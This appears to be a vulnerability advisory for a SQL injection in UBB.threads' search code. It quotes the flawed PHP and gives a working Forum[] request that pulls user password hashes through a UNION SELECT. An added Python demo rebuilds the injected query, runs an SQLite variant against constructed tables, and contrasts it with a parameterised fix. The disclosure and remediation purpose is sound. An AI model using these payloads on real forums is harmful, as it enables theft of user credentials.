Description:
UBB.threads is a popular online forum system written in PHP that
allows webmasters and site owners to host their own discussion
forums within their website. Unfortunately UBB.threads is vulnerable
to SQL injection in its search functionality, which may allow an
attacker to execute arbitrary SQL queries on the underlying database.
An updated version of UBB.threads has been released to address this issue
and users should upgrade as soon as possible.
SQL Injection
There is an SQL injection issue within the UBB.threads search functionality
that may allow an attacker to execute arbitrary SQL queries on the
underlying database. The vulnerable code can be found in dosearch.inc.php:
  // The forums we are searching will be in a different format
  // depending on where we are coming from
  if (@is_array($_POST['Forum'])) {
      $Forum = join(",",$_POST['Forum']);
  }
  elseif (@is_array($_GET['Forum'])) {
      $Forum = join(",",$_GET['Forum']);
  }
  elseif (isset($_POST['Forum'])) {
      $Forum = ",{$_POST['Forum']},";
  }
  elseif (isset($_GET['Forum'])) {
      $Forum = ",{$_GET['Forum']},";
  }
  else {
      $Forum = "";
  }
As we can see in the above code, the $Forum variable is assigned unsanitized
GPC (GET/POST/cookie) data, based on a few different conditions. Note that when
Forum is submitted as an array, its elements are joined with commas, and the
code that follows splits the string on commas again, so the comma acts as a
delimiter rather than as user-controlled content. Soon after this the following
code is executed.
  // Now we need to figure out what forums we are searching
  $catin = "";
  $boardin = "";
  $allforums = "";
  $forumlist = "";
  $Forum = split(",",$Forum);
  for($i=0;$i [...] $kids) {   // loop header and start of body truncated in the advisory text
          if (in_array($bnum,$kids) && !preg_match("/'$fid'/",$boardin)) {
              $boardin .="'$fid',";
          } // end if
        } // end foreach
      }
    }
  }
  $catin = preg_replace("/,$/","",$catin);
  $boardin = preg_replace("/,$/","",$boardin);
  $forumlist = preg_replace("/,$/","",$forumlist);
  if ($catin) {
      $catin = "CATEGORY_ID IN ($catin)";
      if ($boardin) { $catin .= " OR "; }
  }
  if ($boardin) {
      $boardin = "FORUM_ID IN ($boardin)";
  }
  if (!$catin && !$boardin) {
      $catin = "1";
  }
  // Regular query here, since all query vars come from within the script
  $query = "
      SELECT FORUM_ID,FORUM_TITLE,CATEGORY_ID,FORUM_IS_ACTIVE
      FROM {$config['TABLE_PREFIX']}FORUMS
      WHERE FORUM_IS_ACTIVE = '1'
      AND ($catin $boardin)
  ";
  $sth = $dbh -> do_query($query,__LINE__,__FILE__);
  $boardin = "";
At first this issue appears hard to exploit effectively: commas are consumed as
the array delimiter, certain letters are out of the question, and everything
placed in the $Forum array is wrapped in single quotes. However, because each
Forum[] element is quoted and then comma-joined, every comma the attacker needs
is supplied by an element boundary, and the single quotes can be closed from
inside an element. A search request like the one below therefore executes
fairly dangerous SQL queries (%2b is the URL encoding of the + operator; a
literal + in the request would decode to a space).
ubb=dosearch
&fromsearch=1
&Words=test
&Forum[]=f-99')) UNION SELECT '1
&Forum[]=f' %2b MID('' %2b USER_PASSWORD %2b '
&Forum[]=f1
&Forum[]=f1') %2b '
&Forum[]=f1
&Forum[]=f1' FROM ubbt_USERS/*
A couple of preconditions exist. First, a user must be logged in (a standard
user account suffices), and in the specific example above the search actually
has to return a result. So, in order to see the first character of the first
user's password we have to specify a valid search term (the Words parameter)
and a valid forum id (the first column of the UNION SELECT is 1, which is a
valid forum id). The UNION also has to supply one value per column of the
original SELECT, which is why the request carries four quoted values. Of course
this is one quickly put together example, and other SQL injection attacks are
possible as well.
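As an added example that is not part of this advisory or of UBB.threads, the following Python models how dosearch.inc.php glues the Forum[] elements into the FORUM_ID IN (...) clause, reassembles the request above into the query the database would see, and contrasts that with a hardened builder that accepts only integer forum ids and binds them as parameters. Because the loop body is truncated in the advisory, the model assumes each element has its leading letter stripped, is single-quoted and comma-appended with no other check, which is the reading the payload's shape implies. The table names, rows and password hash are constructed for the example, the table prefix is assumed to be ubbt_ because the payload names ubbt_USERS, and the second payload is a constructed SQLite-runnable variant of the advisory's one (|| in place of the MySQL-only + and MID() tricks), since SQLite cannot evaluate the original.

```python
"""Added example (not UBB.threads code): reassembles the advisory's Forum[] payload
the way dosearch.inc.php glues it into FORUM_ID IN (...), then shows a hardened
builder that admits only integer forum ids and binds them as parameters.
Tables, rows and the password hash below are constructed for this example."""
import re
import sqlite3

TABLE_PREFIX = "ubbt_"   # assumed: the prefix the advisory's payload names (ubbt_USERS)

# The six Forum[] elements from the advisory's request, with %2b decoded to '+'.
ADVISORY_PAYLOAD = [
    "f-99')) UNION SELECT '1",
    "f' + MID('' + USER_PASSWORD + '",
    "f1",
    "f1') + '",
    "f1",
    "f1' FROM ubbt_USERS/*",
]

BASE_SELECT = (
    "SELECT FORUM_ID,FORUM_TITLE,CATEGORY_ID,FORUM_IS_ACTIVE "
    f"FROM {TABLE_PREFIX}FORUMS WHERE FORUM_IS_ACTIVE = '1'"
)


def boardin_vulnerable(forum_elements):
    """Model of the advisory's $boardin assembly for forum elements.

    Assumption (the loop body is truncated in the advisory text): the leading
    forum letter is stripped, the remainder is wrapped in single quotes and
    appended with a comma, the trailing comma is removed, and nothing else is
    checked. The join(",")/split(",") round trip means every comma the payload
    needs is supplied by an array-element boundary.
    """
    boardin = ""
    for element in forum_elements:
        fid = element[1:]                      # assumed: drop the leading 'f'
        boardin += f"'{fid}',"                 # $boardin .= "'$fid',"
    boardin = re.sub(r",$", "", boardin)       # preg_replace("/,$/","",$boardin)
    return f"FORUM_ID IN ({boardin})"


def query_vulnerable(forum_elements):
    """The full query string the advisory's code would hand to do_query()."""
    return f"{BASE_SELECT} AND ({boardin_vulnerable(forum_elements)})"


# Hypothetical accepted shape for a forum element: 'f' plus an integer id.
# The advisory shows both 'f-99' and 'f1', so a sign is tolerated; quotes,
# keywords and comment markers never reach the SQL string.
FORUM_ELEMENT_RE = re.compile(r"^f(-?\d{1,9})$")


def query_hardened(forum_elements):
    """Return (sql, params): validated integer ids bound through '?' placeholders."""
    ids = []
    for element in forum_elements:
        m = FORUM_ELEMENT_RE.match(element)
        if m is None:
            raise ValueError(f"rejecting Forum[] element {element!r}")
        ids.append(int(m.group(1)))
    if not ids:
        return f"{BASE_SELECT} AND (1)", ()    # mirrors $catin = "1" when nothing was selected
    placeholders = ",".join("?" * len(ids))
    return f"{BASE_SELECT} AND (FORUM_ID IN ({placeholders}))", tuple(ids)


# Constructed variant of the advisory's payload that SQLite can evaluate: same
# structure (close the IN(), UNION four columns, comment out the tail), but
# string concatenation via || instead of the MySQL-only '+'/MID() tricks.
SQLITE_PAYLOAD = [
    "f-99')) UNION SELECT '1",
    "f' || USER_PASSWORD || '",
    "f1",
    "f1' FROM ubbt_USERS/*",
]


def demo():
    """Run both builders against constructed tables and return the observations."""
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE {TABLE_PREFIX}FORUMS (FORUM_ID INTEGER, FORUM_TITLE TEXT,
                                           CATEGORY_ID INTEGER, FORUM_IS_ACTIVE TEXT);
        CREATE TABLE {TABLE_PREFIX}USERS (USER_ID INTEGER, USER_NAME TEXT, USER_PASSWORD TEXT);
        INSERT INTO {TABLE_PREFIX}FORUMS VALUES (1,'General',1,'1'),(2,'Support',1,'1'),(3,'Archive',2,'0');
        INSERT INTO {TABLE_PREFIX}USERS VALUES (1,'admin','0123456789abcdef0123456789abcdef');  -- constructed hash
    """)
    sql, params = query_hardened(["f1", "f2", "f3"])
    hardened_rows = con.execute(sql, params).fetchall()        # only the active forums 1 and 2
    try:
        query_hardened(ADVISORY_PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    leaked = con.execute(query_vulnerable(SQLITE_PAYLOAD)).fetchall()   # rows come from ubbt_USERS
    return {"hardened_rows": hardened_rows, "rejected": rejected, "leaked": leaked}


if __name__ == "__main__":
    print(query_vulnerable(ADVISORY_PAYLOAD))
    for key, value in demo().items():
        print(key, value)
```

Running the block prints the reassembled query, in which the first element closes FORUM_ID IN ('-99')) and the last one starts a /* comment that swallows the closing quote and parenthesis the PHP appends afterwards. The hardened builder keeps the original query shape (including the "1" fallback when no forum is selected) but never lets user bytes into the SQL text, so the same request is rejected before a query is built.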
Solution:
The UBB.threads developers were very prompt in addressing this issue and released
a patch the same day as we reported the issue to them. An updated version of
UBB.threads can be found at the official UBB.threads website.
http://www.ubbcentral.com/forums/ubbthreads.php/topics/216722/
Credits:
James Bercegay of the GulfTech Security Research Team